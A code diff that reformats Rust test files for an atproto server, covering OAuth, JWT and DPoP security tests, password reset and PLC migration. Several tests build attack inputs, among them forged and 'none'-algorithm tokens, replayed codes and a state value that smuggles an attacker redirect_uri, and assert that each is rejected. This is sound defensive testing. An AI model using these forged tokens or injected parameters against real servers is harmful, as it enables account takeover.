use wiremock::{Mock, MockServer, ResponseTemplate};
14
13
use wiremock::matchers::{method, path};
14
+
use wiremock::{Mock, MockServer, ResponseTemplate};
15
15
16
16
fn no_redirect_client() -> reqwest::Client {
17
17
reqwest::Client::builder()
···
50
50
mock_server
51
51
}
52
52
53
-
async fn get_oauth_tokens(
54
-
http_client: &reqwest::Client,
55
-
url: &str,
56
-
) -> (String, String, String) {
53
+
async fn get_oauth_tokens(http_client: &reqwest::Client, url: &str) -> (String, String, String) {
57
54
let ts = Utc::now().timestamp_millis();
58
55
let handle = format!("sec-test-{}", ts);
59
56
let email = format!("sec-test-{}@example.com", ts);
···
100
97
.send()
101
98
.await
102
99
.unwrap();
103
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
104
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
100
+
let location = auth_res
101
+
.headers()
102
+
.get("location")
103
+
.unwrap()
104
+
.to_str()
105
+
.unwrap();
106
+
let code = location
107
+
.split("code=")
108
+
.nth(1)
109
+
.unwrap()
110
+
.split('&')
111
+
.next()
112
+
.unwrap();
105
113
let token_body: Value = http_client
106
114
.post(format!("{}/oauth/token", url))
107
115
.form(&[
···
137
145
.send()
138
146
.await
139
147
.unwrap();
140
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected");
148
+
assert_eq!(
149
+
res.status(),
150
+
StatusCode::UNAUTHORIZED,
151
+
"Forged signature should be rejected"
152
+
);
141
153
}
142
154
143
155
#[tokio::test]
···
157
169
.send()
158
170
.await
159
171
.unwrap();
160
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected");
172
+
assert_eq!(
173
+
res.status(),
174
+
StatusCode::UNAUTHORIZED,
175
+
"Modified payload should be rejected"
176
+
);
161
177
}
162
178
163
179
#[tokio::test]
···
186
202
.send()
187
203
.await
188
204
.unwrap();
189
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected");
205
+
assert_eq!(
206
+
res.status(),
207
+
StatusCode::UNAUTHORIZED,
208
+
"Algorithm 'none' attack should be rejected"
209
+
);
190
210
}
191
211
192
212
#[tokio::test]
···
215
235
.send()
216
236
.await
217
237
.unwrap();
218
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected");
238
+
assert_eq!(
239
+
res.status(),
240
+
StatusCode::UNAUTHORIZED,
241
+
"Algorithm substitution attack should be rejected"
242
+
);
219
243
}
220
244
221
245
#[tokio::test]
···
244
268
.send()
245
269
.await
246
270
.unwrap();
247
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected");
271
+
assert_eq!(
272
+
res.status(),
273
+
StatusCode::UNAUTHORIZED,
274
+
"Expired token should be rejected"
275
+
);
248
276
}
249
277
250
278
#[tokio::test]
···
266
294
.send()
267
295
.await
268
296
.unwrap();
269
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "PKCE plain method should be rejected");
297
+
assert_eq!(
298
+
res.status(),
299
+
StatusCode::BAD_REQUEST,
300
+
"PKCE plain method should be rejected"
301
+
);
270
302
let body: Value = res.json().await.unwrap();
271
303
assert_eq!(body["error"], "invalid_request");
272
304
assert!(
273
-
body["error_description"].as_str().unwrap().to_lowercase().contains("s256"),
305
+
body["error_description"]
306
+
.as_str()
307
+
.unwrap()
308
+
.to_lowercase()
309
+
.contains("s256"),
274
310
"Error should mention S256 requirement"
275
311
);
276
312
}
···
292
328
.send()
293
329
.await
294
330
.unwrap();
295
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected");
331
+
assert_eq!(
332
+
res.status(),
333
+
StatusCode::BAD_REQUEST,
334
+
"Missing PKCE challenge should be rejected"
335
+
);
296
336
}
297
337
298
338
#[tokio::test]
···
346
386
.send()
347
387
.await
348
388
.unwrap();
349
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
350
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
389
+
let location = auth_res
390
+
.headers()
391
+
.get("location")
392
+
.unwrap()
393
+
.to_str()
394
+
.unwrap();
395
+
let code = location
396
+
.split("code=")
397
+
.nth(1)
398
+
.unwrap()
399
+
.split('&')
400
+
.next()
401
+
.unwrap();
351
402
let token_res = http_client
352
403
.post(format!("{}/oauth/token", url))
353
404
.form(&[
···
360
411
.send()
361
412
.await
362
413
.unwrap();
363
-
assert_eq!(token_res.status(), StatusCode::BAD_REQUEST, "Wrong PKCE verifier should be rejected");
414
+
assert_eq!(
415
+
token_res.status(),
416
+
StatusCode::BAD_REQUEST,
417
+
"Wrong PKCE verifier should be rejected"
418
+
);
364
419
let body: Value = token_res.json().await.unwrap();
365
420
assert_eq!(body["error"], "invalid_grant");
366
421
}
···
415
470
.send()
416
471
.await
417
472
.unwrap();
418
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
419
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
473
+
let location = auth_res
474
+
.headers()
475
+
.get("location")
476
+
.unwrap()
477
+
.to_str()
478
+
.unwrap();
479
+
let code = location
480
+
.split("code=")
481
+
.nth(1)
482
+
.unwrap()
483
+
.split('&')
484
+
.next()
485
+
.unwrap();
420
486
let stolen_code = code.to_string();
421
487
let first_res = http_client
422
488
.post(format!("{}/oauth/token", url))
···
430
496
.send()
431
497
.await
432
498
.unwrap();
433
-
assert_eq!(first_res.status(), StatusCode::OK, "First use should succeed");
499
+
assert_eq!(
500
+
first_res.status(),
501
+
StatusCode::OK,
502
+
"First use should succeed"
503
+
);
434
504
let replay_res = http_client
435
505
.post(format!("{}/oauth/token", url))
436
506
.form(&[
···
443
513
.send()
444
514
.await
445
515
.unwrap();
446
-
assert_eq!(replay_res.status(), StatusCode::BAD_REQUEST, "Replay attack should fail");
516
+
assert_eq!(
517
+
replay_res.status(),
518
+
StatusCode::BAD_REQUEST,
519
+
"Replay attack should fail"
520
+
);
447
521
let body: Value = replay_res.json().await.unwrap();
448
522
assert_eq!(body["error"], "invalid_grant");
449
523
}
···
498
572
.send()
499
573
.await
500
574
.unwrap();
501
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
502
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
575
+
let location = auth_res
576
+
.headers()
577
+
.get("location")
578
+
.unwrap()
579
+
.to_str()
580
+
.unwrap();
581
+
let code = location
582
+
.split("code=")
583
+
.nth(1)
584
+
.unwrap()
585
+
.split('&')
586
+
.next()
587
+
.unwrap();
503
588
let token_body: Value = http_client
504
589
.post(format!("{}/oauth/token", url))
505
590
.form(&[
···
529
614
.json()
530
615
.await
531
616
.unwrap();
532
-
assert!(first_refresh["access_token"].is_string(), "First refresh should succeed");
617
+
assert!(
618
+
first_refresh["access_token"].is_string(),
619
+
"First refresh should succeed"
620
+
);
533
621
let new_refresh_token = first_refresh["refresh_token"].as_str().unwrap();
534
622
let replay_res = http_client
535
623
.post(format!("{}/oauth/token", url))
···
541
629
.send()
542
630
.await
543
631
.unwrap();
544
-
assert_eq!(replay_res.status(), StatusCode::BAD_REQUEST, "Refresh token replay should fail");
632
+
assert_eq!(
633
+
replay_res.status(),
634
+
StatusCode::BAD_REQUEST,
635
+
"Refresh token replay should fail"
636
+
);
545
637
let body: Value = replay_res.json().await.unwrap();
546
638
assert_eq!(body["error"], "invalid_grant");
547
639
assert!(
548
-
body["error_description"].as_str().unwrap().to_lowercase().contains("reuse"),
640
+
body["error_description"]
641
+
.as_str()
642
+
.unwrap()
643
+
.to_lowercase()
644
+
.contains("reuse"),
549
645
"Error should mention token reuse"
550
646
);
551
647
let family_revoked_res = http_client
···
586
682
.send()
587
683
.await
588
684
.unwrap();
589
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected");
685
+
assert_eq!(
686
+
res.status(),
687
+
StatusCode::BAD_REQUEST,
688
+
"Unregistered redirect_uri should be rejected"
689
+
);
590
690
}
591
691
592
692
#[tokio::test]
···
651
751
.send()
652
752
.await
653
753
.unwrap();
654
-
assert_eq!(auth_res.status(), StatusCode::FORBIDDEN, "Deactivated account should be blocked from OAuth");
754
+
assert_eq!(
755
+
auth_res.status(),
756
+
StatusCode::FORBIDDEN,
757
+
"Deactivated account should be blocked from OAuth"
758
+
);
655
759
let body: Value = auth_res.json().await.unwrap();
656
760
assert_eq!(body["error"], "access_denied");
657
761
}
···
708
812
.send()
709
813
.await
710
814
.unwrap();
711
-
assert!(auth_res.status().is_redirection(), "Should redirect successfully");
712
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
815
+
assert!(
816
+
auth_res.status().is_redirection(),
817
+
"Should redirect successfully"
818
+
);
819
+
let location = auth_res
820
+
.headers()
821
+
.get("location")
822
+
.unwrap()
823
+
.to_str()
824
+
.unwrap();
713
825
assert!(
714
826
location.starts_with(redirect_uri),
715
827
"Redirect should go to registered URI, not attacker URI. Got: {}",
···
721
833
"State injection should not add extra redirect_uri parameters"
722
834
);
723
835
assert!(
724
-
location.contains(&urlencoding::encode(malicious_state).to_string()) ||
725
-
location.contains("state=state%26redirect_uri"),
836
+
location.contains(&urlencoding::encode(malicious_state).to_string())
837
+
|| location.contains("state=state%26redirect_uri"),
726
838
"State parameter should be properly URL-encoded. Got: {}",
727
839
location
728
840
);
···
781
893
.send()
782
894
.await
783
895
.unwrap();
784
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
785
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
896
+
let location = auth_res
897
+
.headers()
898
+
.get("location")
899
+
.unwrap()
900
+
.to_str()
901
+
.unwrap();
902
+
let code = location
903
+
.split("code=")
904
+
.nth(1)
905
+
.unwrap()
906
+
.split('&')
907
+
.next()
908
+
.unwrap();
786
909
let token_res = http_client
787
910
.post(format!("{}/oauth/token", url))
788
911
.form(&[
···
803
926
let body: Value = token_res.json().await.unwrap();
804
927
assert_eq!(body["error"], "invalid_grant");
805
928
assert!(
806
-
body["error_description"].as_str().unwrap().contains("client_id"),
929
+
body["error_description"]
930
+
.as_str()
931
+
.unwrap()
932
+
.contains("client_id"),
807
933
"Error should mention client_id mismatch"
808
934
);
809
935
}
···
831
957
let verifier2 = DPoPVerifier::new(secret2);
832
958
let nonce_from_server1 = verifier1.generate_nonce();
833
959
let result = verifier2.validate_nonce(&nonce_from_server1);
834
-
assert!(result.is_err(), "Nonce from different server should be rejected");
960
+
assert!(
961
+
result.is_err(),
962
+
"Nonce from different server should be rejected"
963
+
);
835
964
}
836
965
837
966
#[test]
838
967
fn test_security_dpop_proof_signature_tampering() {
839
-
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
968
+
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
840
969
use p256::elliptic_curve::sec1::ToEncodedPoint;
841
970
let secret = b"test-dpop-secret-32-bytes-long!!";
842
971
let verifier = DPoPVerifier::new(secret);
···
870
999
let tampered_sig = URL_SAFE_NO_PAD.encode(&sig_bytes);
871
1000
let tampered_proof = format!("{}.{}.{}", header_b64, payload_b64, tampered_sig);
872
1001
let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None);
873
-
assert!(result.is_err(), "Tampered DPoP signature should be rejected");
1002
+
assert!(
1003
+
result.is_err(),
1004
+
"Tampered DPoP signature should be rejected"
1005
+
);
874
1006
}
875
1007
876
1008
#[test]
877
1009
fn test_security_dpop_proof_key_substitution() {
878
-
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
1010
+
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
879
1011
use p256::elliptic_curve::sec1::ToEncodedPoint;
880
1012
let secret = b"test-dpop-secret-32-bytes-long!!";
881
1013
let verifier = DPoPVerifier::new(secret);
···
907
1039
let signature: Signature = signing_key.sign(signing_input.as_bytes());
908
1040
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
909
1041
let mismatched_proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64);
910
-
let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None);
911
-
assert!(result.is_err(), "DPoP proof with mismatched key should be rejected");
1042
+
let result =
1043
+
verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None);
1044
+
assert!(
1045
+
result.is_err(),
1046
+
"DPoP proof with mismatched key should be rejected"
1047
+
);
912
1048
}
913
1049
914
1050
#[test]
···
925
1061
}
926
1062
let first = &results[0];
927
1063
for (i, result) in results.iter().enumerate() {
928
-
assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i);
1064
+
assert_eq!(
1065
+
first, result,
1066
+
"Thumbprint should be deterministic, but iteration {} differs",
1067
+
i
1068
+
);
929
1069
}
930
1070
}
931
1071
932
1072
#[test]
933
1073
fn test_security_dpop_iat_clock_skew_limits() {
934
-
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
1074
+
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
935
1075
use p256::elliptic_curve::sec1::ToEncodedPoint;
936
1076
let secret = b"test-dpop-secret-32-bytes-long!!";
937
1077
let verifier = DPoPVerifier::new(secret);
···
974
1114
let proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64);
975
1115
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
976
1116
if should_fail {
977
-
assert!(result.is_err(), "iat offset {} should be rejected", offset_secs);
1117
+
assert!(
1118
+
result.is_err(),
1119
+
"iat offset {} should be rejected",
1120
+
offset_secs
1121
+
);
978
1122
} else {
979
-
assert!(result.is_ok(), "iat offset {} should be accepted", offset_secs);
1123
+
assert!(
1124
+
result.is_ok(),
1125
+
"iat offset {} should be accepted",
1126
+
offset_secs
1127
+
);
980
1128
}
981
1129
}
982
1130
}
983
1131
984
1132
#[test]
985
1133
fn test_security_dpop_method_case_insensitivity() {
986
-
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
1134
+
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
987
1135
use p256::elliptic_curve::sec1::ToEncodedPoint;
988
1136
let secret = b"test-dpop-secret-32-bytes-long!!";
989
1137
let verifier = DPoPVerifier::new(secret);
···
1015
1163
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1016
1164
let proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64);
1017
1165
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1018
-
assert!(result.is_ok(), "HTTP method comparison should be case-insensitive");
1166
+
assert!(
1167
+
result.is_ok(),
1168
+
"HTTP method comparison should be case-insensitive"
1169
+
);
1019
1170
}
1020
1171
1021
1172
#[tokio::test]
···
1055
1206
async fn test_security_token_with_wrong_typ_rejected() {
1056
1207
let url = base_url().await;
1057
1208
let http_client = client();
1058
-
let wrong_types = vec![
1059
-
"JWT",
1060
-
"jwt",
1061
-
"at+JWT",
1062
-
"access_token",
1063
-
"",
1064
-
];
1209
+
let wrong_types = vec!["JWT", "jwt", "at+JWT", "access_token", ""];
1065
1210
for typ in wrong_types {
1066
1211
let header = json!({
1067
1212
"alg": "HS256",
···
1100
1245
let http_client = client();
1101
1246
let tokens_missing_claims = vec![
1102
1247
(json!({"iss": "x", "sub": "x", "aud": "x", "iat": 0}), "exp"),
1103
-
(json!({"iss": "x", "sub": "x", "aud": "x", "exp": 9999999999i64}), "iat"),
1104
-
(json!({"iss": "x", "aud": "x", "iat": 0, "exp": 9999999999i64}), "sub"),
1248
+
(
1249
+
json!({"iss": "x", "sub": "x", "aud": "x", "exp": 9999999999i64}),
1250
+
"iat",
1251
+
),
1252
+
(
1253
+
json!({"iss": "x", "aud": "x", "iat": 0, "exp": 9999999999i64}),
1254
+
"sub",
1255
+
),
1105
1256
];
1106
1257
for (payload, missing_claim) in tokens_missing_claims {
1107
1258
let header = json!({
···
1155
1306
res.status(),
1156
1307
StatusCode::UNAUTHORIZED,
1157
1308
"Malformed token '{}' should be rejected",
1158
-
if token.len() > 50 { &token[..50] } else { token }
1309
+
if token.len() > 50 {
1310
+
&token[..50]
1311
+
} else {
1312
+
token
1313
+
}
1159
1314
);
1160
1315
}
1161
1316
}
···
1181
1336
res.status(),
1182
1337
StatusCode::OK,
1183
1338
"Auth header '{}...' should be accepted (RFC 7235 case-insensitivity)",
1184
-
if auth_header.len() > 30 { &auth_header[..30] } else { &auth_header }
1339
+
if auth_header.len() > 30 {
1340
+
&auth_header[..30]
1341
+
} else {
1342
+
&auth_header
1343
+
}
1185
1344
);
1186
1345
}
1187
1346
let invalid_formats = vec![
···
1201
1360
res.status(),
1202
1361
StatusCode::UNAUTHORIZED,
1203
1362
"Auth header '{}...' should be rejected",
1204
-
if auth_header.len() > 30 { &auth_header[..30] } else { &auth_header }
1363
+
if auth_header.len() > 30 {
1364
+
&auth_header[..30]
1365
+
} else {
1366
+
&auth_header
1367
+
}
1205
1368
);
1206
1369
}
1207
1370
}
···
1215
1378
.send()
1216
1379
.await
1217
1380
.unwrap();
1218
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401");
1381
+
assert_eq!(
1382
+
res.status(),
1383
+
StatusCode::UNAUTHORIZED,
1384
+
"Missing auth header should return 401"
1385
+
);
1219
1386
}
1220
1387
1221
1388
#[tokio::test]
···
1228
1395
.send()
1229
1396
.await
1230
1397
.unwrap();
1231
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401");
1398
+
assert_eq!(
1399
+
res.status(),
1400
+
StatusCode::UNAUTHORIZED,
1401
+
"Empty auth header should return 401"
1402
+
);
1232
1403
}
1233
1404
1234
1405
#[tokio::test]
···
1250
1421
.await
1251
1422
.unwrap();
1252
1423
let introspect_body: Value = introspect_res.json().await.unwrap();
1253
-
assert_eq!(introspect_body["active"], false, "Revoked token should be inactive");
1424
+
assert_eq!(
1425
+
introspect_body["active"], false,
1426
+
"Revoked token should be inactive"
1427
+
);
1254
1428
}
1255
1429
1256
1430
#[tokio::test]
···
1259
1433
let url = base_url().await;
1260
1434
let http_client = no_redirect_client();
1261
1435
let ts = Utc::now().timestamp_nanos_opt().unwrap_or(0);
1262
-
let unique_ip = format!("10.{}.{}.{}", (ts >> 16) & 0xFF, (ts >> 8) & 0xFF, ts & 0xFF);
1436
+
let unique_ip = format!(
1437
+
"10.{}.{}.{}",
1438
+
(ts >> 16) & 0xFF,
1439
+
(ts >> 8) & 0xFF,
1440
+
ts & 0xFF
1441
+
);
1263
1442
let redirect_uri = "https://example.com/rate-limit-callback";
1264
1443
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1265
1444
let client_id = mock_client.uri();
···
1316
1495
ath: Option<&str>,
1317
1496
iat_offset_secs: i64,
1318
1497
) -> String {
1319
-
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
1498
+
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
1320
1499
let signing_key = SigningKey::random(&mut rand::thread_rng());
1321
1500
let verifying_key = signing_key.verifying_key();
1322
1501
let point = verifying_key.to_encoded_point(false);
···
1404
1583
assert!(thumbprint.is_ok());
1405
1584
let tp = thumbprint.unwrap();
1406
1585
assert!(!tp.is_empty());
1407
-
assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_'));
1586
+
assert!(
1587
+
tp.chars()
1588
+
.all(|c| c.is_alphanumeric() || c == '-' || c == '_')
1589
+
);
1408
1590
}
1409
1591
1410
1592
#[test]
···
1604
1786
let secret = b"test-dpop-secret-32-bytes-long!!";
1605
1787
let verifier = DPoPVerifier::new(secret);
1606
1788
let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0);
1607
-
let result = verifier.verify_proof(
1608
-
&proof,
1609
-
"POST",
1610
-
"https://example.com/token?foo=bar",
1611
-
None,
1789
+
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None);
1790
+
assert!(
1791
+
result.is_ok(),
1792
+
"Query params should be ignored: {:?}",
1793
+
result
1612
1794
);
1613
-
assert!(result.is_ok(), "Query params should be ignored: {:?}", result);
1614
1795
}
+74
-20
tests/password_reset.rs
+74
-20
tests/password_reset.rs
···
1
1
mod common;
2
2
mod helpers;
3
+
use helpers::verify_new_account;
3
4
use reqwest::StatusCode;
4
-
use serde_json::{json, Value};
5
+
use serde_json::{Value, json};
5
6
use sqlx::PgPool;
6
-
use helpers::verify_new_account;
7
7
8
8
async fn get_pool() -> PgPool {
9
9
let conn_str = common::get_db_connection_string().await;
···
27
27
"password": "oldpassword"
28
28
});
29
29
let res = client
30
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
30
+
.post(format!(
31
+
"{}/xrpc/com.atproto.server.createAccount",
32
+
base_url
33
+
))
31
34
.json(&payload)
32
35
.send()
33
36
.await
34
37
.expect("Failed to create account");
35
38
assert_eq!(res.status(), StatusCode::OK);
36
39
let res = client
37
-
.post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url))
40
+
.post(format!(
41
+
"{}/xrpc/com.atproto.server.requestPasswordReset",
42
+
base_url
43
+
))
38
44
.json(&json!({"email": email}))
39
45
.send()
40
46
.await
···
59
65
let client = common::client();
60
66
let base_url = common::base_url().await;
61
67
let res = client
62
-
.post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url))
68
+
.post(format!(
69
+
"{}/xrpc/com.atproto.server.requestPasswordReset",
70
+
base_url
71
+
))
63
72
.json(&json!({"email": "nonexistent@example.com"}))
64
73
.send()
65
74
.await
···
82
91
"password": old_password
83
92
});
84
93
let res = client
85
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
94
+
.post(format!(
95
+
"{}/xrpc/com.atproto.server.createAccount",
96
+
base_url
97
+
))
86
98
.json(&payload)
87
99
.send()
88
100
.await
···
92
104
let did = body["did"].as_str().unwrap();
93
105
let _ = verify_new_account(&client, did).await;
94
106
let res = client
95
-
.post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url))
107
+
.post(format!(
108
+
"{}/xrpc/com.atproto.server.requestPasswordReset",
109
+
base_url
110
+
))
96
111
.json(&json!({"email": email}))
97
112
.send()
98
113
.await
···
107
122
.expect("User not found");
108
123
let token = user.password_reset_code.expect("No reset code");
109
124
let res = client
110
-
.post(format!("{}/xrpc/com.atproto.server.resetPassword", base_url))
125
+
.post(format!(
126
+
"{}/xrpc/com.atproto.server.resetPassword",
127
+
base_url
128
+
))
111
129
.json(&json!({
112
130
"token": token,
113
131
"password": new_password
···
126
144
assert!(user.password_reset_code.is_none());
127
145
assert!(user.password_reset_code_expires_at.is_none());
128
146
let res = client
129
-
.post(format!("{}/xrpc/com.atproto.server.createSession", base_url))
147
+
.post(format!(
148
+
"{}/xrpc/com.atproto.server.createSession",
149
+
base_url
150
+
))
130
151
.json(&json!({
131
152
"identifier": handle,
132
153
"password": new_password
···
136
157
.expect("Failed to login");
137
158
assert_eq!(res.status(), StatusCode::OK);
138
159
let res = client
139
-
.post(format!("{}/xrpc/com.atproto.server.createSession", base_url))
160
+
.post(format!(
161
+
"{}/xrpc/com.atproto.server.createSession",
162
+
base_url
163
+
))
140
164
.json(&json!({
141
165
"identifier": handle,
142
166
"password": old_password
···
152
176
let client = common::client();
153
177
let base_url = common::base_url().await;
154
178
let res = client
155
-
.post(format!("{}/xrpc/com.atproto.server.resetPassword", base_url))
179
+
.post(format!(
180
+
"{}/xrpc/com.atproto.server.resetPassword",
181
+
base_url
182
+
))
156
183
.json(&json!({
157
184
"token": "invalid-token",
158
185
"password": "newpassword"
···
178
205
"password": "oldpassword"
179
206
});
180
207
let res = client
181
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
208
+
.post(format!(
209
+
"{}/xrpc/com.atproto.server.createAccount",
210
+
base_url
211
+
))
182
212
.json(&payload)
183
213
.send()
184
214
.await
185
215
.expect("Failed to create account");
186
216
assert_eq!(res.status(), StatusCode::OK);
187
217
let res = client
188
-
.post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url))
218
+
.post(format!(
219
+
"{}/xrpc/com.atproto.server.requestPasswordReset",
220
+
base_url
221
+
))
189
222
.json(&json!({"email": email}))
190
223
.send()
191
224
.await
···
207
240
.await
208
241
.expect("Failed to expire token");
209
242
let res = client
210
-
.post(format!("{}/xrpc/com.atproto.server.resetPassword", base_url))
243
+
.post(format!(
244
+
"{}/xrpc/com.atproto.server.resetPassword",
245
+
base_url
246
+
))
211
247
.json(&json!({
212
248
"token": token,
213
249
"password": "newpassword"
···
233
269
"password": "oldpassword"
234
270
});
235
271
let res = client
236
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
272
+
.post(format!(
273
+
"{}/xrpc/com.atproto.server.createAccount",
274
+
base_url
275
+
))
237
276
.json(&payload)
238
277
.send()
239
278
.await
···
250
289
.expect("Failed to get session");
251
290
assert_eq!(res.status(), StatusCode::OK);
252
291
let res = client
253
-
.post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url))
292
+
.post(format!(
293
+
"{}/xrpc/com.atproto.server.requestPasswordReset",
294
+
base_url
295
+
))
254
296
.json(&json!({"email": email}))
255
297
.send()
256
298
.await
···
265
307
.expect("User not found");
266
308
let token = user.password_reset_code.expect("No reset code");
267
309
let res = client
268
-
.post(format!("{}/xrpc/com.atproto.server.resetPassword", base_url))
310
+
.post(format!(
311
+
"{}/xrpc/com.atproto.server.resetPassword",
312
+
base_url
313
+
))
269
314
.json(&json!({
270
315
"token": token,
271
316
"password": "newpassword123"
···
288
333
let client = common::client();
289
334
let base_url = common::base_url().await;
290
335
let res = client
291
-
.post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url))
336
+
.post(format!(
337
+
"{}/xrpc/com.atproto.server.requestPasswordReset",
338
+
base_url
339
+
))
292
340
.json(&json!({"email": ""}))
293
341
.send()
294
342
.await
···
311
359
"password": "oldpassword"
312
360
});
313
361
let res = client
314
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
362
+
.post(format!(
363
+
"{}/xrpc/com.atproto.server.createAccount",
364
+
base_url
365
+
))
315
366
.json(&payload)
316
367
.send()
317
368
.await
···
330
381
.expect("Failed to count")
331
382
.unwrap_or(0);
332
383
let res = client
333
-
.post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url))
384
+
.post(format!(
385
+
"{}/xrpc/com.atproto.server.requestPasswordReset",
386
+
base_url
387
+
))
334
388
.json(&json!({"email": email}))
335
389
.send()
336
390
.await
+111
-65
tests/plc_migration.rs
+111
-65
tests/plc_migration.rs
···
2
2
use common::*;
3
3
use k256::ecdsa::SigningKey;
4
4
use reqwest::StatusCode;
5
-
use serde_json::{json, Value};
5
+
use serde_json::{Value, json};
6
6
use sqlx::PgPool;
7
7
use wiremock::matchers::{method, path};
8
8
use wiremock::{Mock, MockServer, ResponseTemplate};
···
73
73
async fn get_user_handle(did: &str) -> Option<String> {
74
74
let db_url = get_db_connection_string().await;
75
75
let pool = PgPool::connect(&db_url).await.ok()?;
76
-
sqlx::query_scalar!(
77
-
r#"SELECT handle FROM users WHERE did = $1"#,
78
-
did
79
-
)
80
-
.fetch_optional(&pool)
81
-
.await
82
-
.ok()?
76
+
sqlx::query_scalar!(r#"SELECT handle FROM users WHERE did = $1"#, did)
77
+
.fetch_optional(&pool)
78
+
.await
79
+
.ok()?
83
80
}
84
81
85
82
fn create_mock_last_op(
···
107
104
})
108
105
}
109
106
110
-
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value {
107
+
fn create_did_document(
108
+
did: &str,
109
+
handle: &str,
110
+
signing_key: &SigningKey,
111
+
pds_endpoint: &str,
112
+
) -> Value {
111
113
let multikey = get_multikey_from_signing_key(signing_key);
112
114
json!({
113
115
"@context": [
···
174
176
async fn test_full_plc_operation_flow() {
175
177
let client = client();
176
178
let (token, did) = create_account_and_login(&client).await;
177
-
let key_bytes = get_user_signing_key(&did).await
179
+
let key_bytes = get_user_signing_key(&did)
180
+
.await
178
181
.expect("Failed to get user signing key");
179
-
let signing_key = SigningKey::from_slice(&key_bytes)
180
-
.expect("Failed to create signing key");
181
-
let handle = get_user_handle(&did).await
182
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
183
+
let handle = get_user_handle(&did)
184
+
.await
182
185
.expect("Failed to get user handle");
183
186
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
184
187
let pds_endpoint = format!("https://{}", hostname);
···
192
195
.await
193
196
.expect("Request failed");
194
197
assert_eq!(request_res.status(), StatusCode::OK);
195
-
let plc_token = get_plc_token_from_db(&did).await
198
+
let plc_token = get_plc_token_from_db(&did)
199
+
.await
196
200
.expect("PLC token not found in database");
197
201
let mock_plc = setup_mock_plc_for_sign(&did, &handle, &signing_key, &pds_endpoint).await;
198
202
unsafe {
···
218
222
"Sign PLC operation should succeed. Response: {:?}",
219
223
sign_body
220
224
);
221
-
let operation = sign_body.get("operation")
225
+
let operation = sign_body
226
+
.get("operation")
222
227
.expect("Response should contain operation");
223
228
assert!(operation.get("sig").is_some(), "Operation should be signed");
224
-
assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation"));
225
-
assert!(operation.get("prev").is_some(), "Operation should have prev reference");
229
+
assert_eq!(
230
+
operation.get("type").and_then(|v| v.as_str()),
231
+
Some("plc_operation")
232
+
);
233
+
assert!(
234
+
operation.get("prev").is_some(),
235
+
"Operation should have prev reference"
236
+
);
226
237
}
227
238
228
239
#[tokio::test]
···
230
241
async fn test_sign_plc_operation_consumes_token() {
231
242
let client = client();
232
243
let (token, did) = create_account_and_login(&client).await;
233
-
let key_bytes = get_user_signing_key(&did).await
244
+
let key_bytes = get_user_signing_key(&did)
245
+
.await
234
246
.expect("Failed to get user signing key");
